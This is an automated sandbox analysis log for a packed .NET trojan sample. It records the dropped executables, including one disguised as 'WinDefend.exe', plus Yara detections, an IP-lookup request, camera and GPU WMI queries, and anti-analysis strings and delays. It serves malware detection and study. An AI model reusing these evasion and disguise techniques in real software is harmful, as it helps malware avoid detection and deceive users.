Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Loaader.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Loader.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: Yara match File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29d5068.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29f4968.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2985470.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2972c08.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.Infected.exe.30000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29f4968.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2997d08.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.Client.exe.350000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Infected.exe.28ed1c8.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2997d08.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.Client.exe.26a68b0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29e4cd0.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29d5068.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2985470.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Infected.exe.28ed1c8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29e4cd0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2972c08.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.2032453597.00000000028ED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2005734875.0000000002911000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.2002428899.0000000000352000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2005734875.00000000029B8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.2003317795.0000000000032000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe PID: 6176, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Infected.exe PID: 3144, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Loaader.exe PID: 7392, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\Client.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\Loader.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\Infected.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\Loaader.exe, type: DROPPED
Source: Yara match File source: 2.2.Client.exe.26a68b0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.2034934534.00000000026A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Client.exe PID: 6152, type: MEMORYSTR
Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: C:\Users\user\AppData\Roaming\Loaader.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\AppData\Roaming\Loader.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Users\user\AppData\Roaming\Loaader.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe, 00000000.00000002.2005734875.00000000029B8000.00000004.00000800.00020000.00000000.sdmp, Infected.exe, 00000003.00000002.2032453597.00000000028ED000.00000004.00000800.00020000.00000000.sdmp, Infected.exe, 00000003.00000000.2003317795.0000000000032000.00000002.00000001.01000000.00000007.sdmp, Infected.exe.0.dr, Loaader.exe.3.dr Binary or memory string: SBIEDLL.DLLM{860BB310-5D01-11D0-BD3B-00A0C911CE86}
Source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe, 00000000.00000002.2005734875.0000000002911000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe, 00000000.00000002.2005734875.00000000029B8000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 00000002.00000002.2034934534.00000000026A3000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 00000002.00000000.2002428899.0000000000352000.00000002.00000001.01000000.00000006.sdmp, Infected.exe, 00000003.00000002.2032453597.00000000028ED000.00000004.00000800.00020000.00000000.sdmp, Infected.exe, 00000003.00000000.2003317795.0000000000032000.00000002.00000001.01000000.00000007.sdmp, Infected.exe.0.dr, Client.exe.0.dr, Loader.exe.2.dr, Loaader.exe.3.dr Binary or memory string: TASKMGR.EXE#PROCESSHACKER.EXE
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe Memory allocated: 27A0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe Memory allocated: 1A910000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\Client.exe Memory allocated: A90000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\Client.exe Memory allocated: 1A5E0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\Infected.exe Memory allocated: 770000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\Infected.exe Memory allocated: 1A300000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Memory allocated: 1520000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Memory allocated: 2ED0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Memory allocated: 4ED0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Memory allocated: 56E0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Memory allocated: 5520000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Memory allocated: 66E0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Memory allocated: 76E0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Memory allocated: 7B30000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Memory allocated: 8B30000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Memory allocated: 9B30000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Loaader.exe Memory allocated: 11D0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Loaader.exe Memory allocated: 1AB80000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Loader.exe Memory allocated: 16A0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Loader.exe Memory allocated: 1B140000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Loader.exe Memory allocated: F10000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Loader.exe Memory allocated: 1A8C0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Loaader.exe Memory allocated: 15F0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Loaader.exe Memory allocated: 1B070000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Memory allocated: 14E0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Memory allocated: 2E70000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Memory allocated: 4E70000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Memory allocated: 5570000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Memory allocated: 6570000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Memory allocated: 66A0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Memory allocated: 76A0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Memory allocated: 79F0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Memory allocated: 89F0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Memory allocated: 1130000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Memory allocated: 2C10000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Memory allocated: 4C10000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Memory allocated: 5350000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Memory allocated: 6350000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Memory allocated: 6480000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Memory allocated: 7480000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Memory allocated: 78D0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Memory allocated: 88D0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Memory allocated: 98D0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\Client.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\Infected.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 599797
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 599672
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 599524
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 599360
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 599218
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 599094
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 598937
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 598826
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 598704
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 598556
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 598433
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 598323
